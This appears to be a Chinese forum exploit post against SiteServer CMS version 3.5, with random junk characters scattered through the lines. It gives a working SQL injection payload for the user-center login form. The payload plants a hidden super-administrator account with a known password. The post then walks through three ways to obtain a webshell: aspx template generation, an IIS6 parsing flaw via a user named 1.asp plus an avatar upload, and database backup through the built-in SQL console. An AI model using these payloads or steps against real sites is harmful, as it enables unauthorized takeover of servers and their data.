经测试秒杀最新的3.5版- _4 D" l% x. K0 b, I
stieserver官网:www.siteserver.cn& q! j2 ^, Z8 ~6 o p2 Z
EXP:
7 R) k3 P# u& _8 z' V直接访问UserCenter/login.aspx
7 ?7 O& c4 T) }用户名处输入:8 W5 l4 \; n1 Z2 U4 ~, S
9 C9 X9 `/ P+ s0 q8 q* l, ]123′insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values(‘blue’,'VffSUZcBPo4=’,'Encrypted’,'i7jq4LwC25wKDoqHErBWaw==’);insert into bairong_AdministratorsInRoles values(‘Administrator’,'blue’);insert into bairong_AdministratorsInRoles values(‘RegisteredUser’,'blue’);insert into bairong_AdministratorsInRoles values(‘ConsoleAdministrator’,'blue’);–
) Z1 Z, g* Q% z8 R# T密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue 密码为lanhai的超级用户。, b( l) _& Z& _2 l) l5 ^# ^
之后再访问后台SiteServer/login.aspx用插入的用户登陆
: h% O) v! J) g$ s% }8 m后台拿webshell的三种方法:
) t+ f K* T1 X一、1 p# B- {4 G% c9 V
站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
1 b" `, O* J7 m2 K7 E! J$ j二、; }# C; x0 Q5 X. o/ |' x% x
成员权限-》添加用户-》用户名为:1.asp
! g1 d7 a3 ]6 g4 P; u8 V- _http://127.0.0.1/usercenter/
9 Z! Q/ X5 O4 A, r* H! f% \/ P用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell
7 i! |5 [+ ]# ^; e1 U7 a( a r; [(ps:后台添加用户时不会验证是否含有非法字符)
1 s1 F# t' H/ p1 M' ^; ]& d: {三、9 u. {0 M9 ?7 q; v" j! S. Y8 v
系统工具-》实用工具-》机器参数查看
6 U0 D+ }7 o' E* C; b" t/ K0 K: W: S可以看到数据库类型、名称,WEB路径+ g, r. h3 e* H$ h. J
系统工具-》数据库工具-》SQL语句查询
1 }" Z( [ S( K4 c3 ^5 y# `这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO |